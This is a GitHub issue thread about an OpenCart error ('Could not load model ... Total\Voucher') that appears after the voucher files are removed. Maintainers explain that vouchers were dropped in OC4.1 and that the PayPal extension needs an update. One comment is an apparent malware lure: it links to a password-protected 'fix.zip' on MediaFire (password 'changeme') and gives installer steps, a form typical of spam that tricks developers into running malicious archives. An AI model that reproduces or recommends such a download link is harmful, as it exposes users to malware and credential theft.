### ISSUE TITLE
Error: Could not load model Opencart\Catalog\Model\Extension\Opencart\Total\Voucher!: in../system/engine/loader.php on line 171

### ISSUE THREAD

**Issue by cgcmart** [opencart/opencart#14108]
**What version of OpenCart are you reporting this for?**
The latest version after removal voucher files
**Describe the bug**
A clear and concise description of what the bug is
What section does it affect?
front store couldn't load, displayed the error.
**To Reproduce**

**Expected behavior**

**Screenshots / Screen recordings**
If applicable, add screenshots or recordings to help explain your problem. Please keep these short and if you can, edit them to point out when/where the problem is.
https://www.useloom.com/ is perfect for screen recording with Chrome or with their desktop app

**Server / Test environment (please complete the following information):**
 - Local development? Deployed to a web server?
 - Operating system
 - PHP version
 - Apache version
 - Browser(s) tested with [e.g. chrome, safari - if applicable]

**Additional context**

**Comment by jungminjun824** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mhcwebdesign** [comment]
Not enough details. Try again, with sufficient details, otherwise it will be just ignored.

**Comment by stalker780** [comment]
Voucher functionality is no longer part of OC4.1

**Comment by cgcmart** [comment]
It looks paypal extension needs to update!

**Comment by danielkerr** [comment]
will be updated on release. extensions need to be linked to download versions.
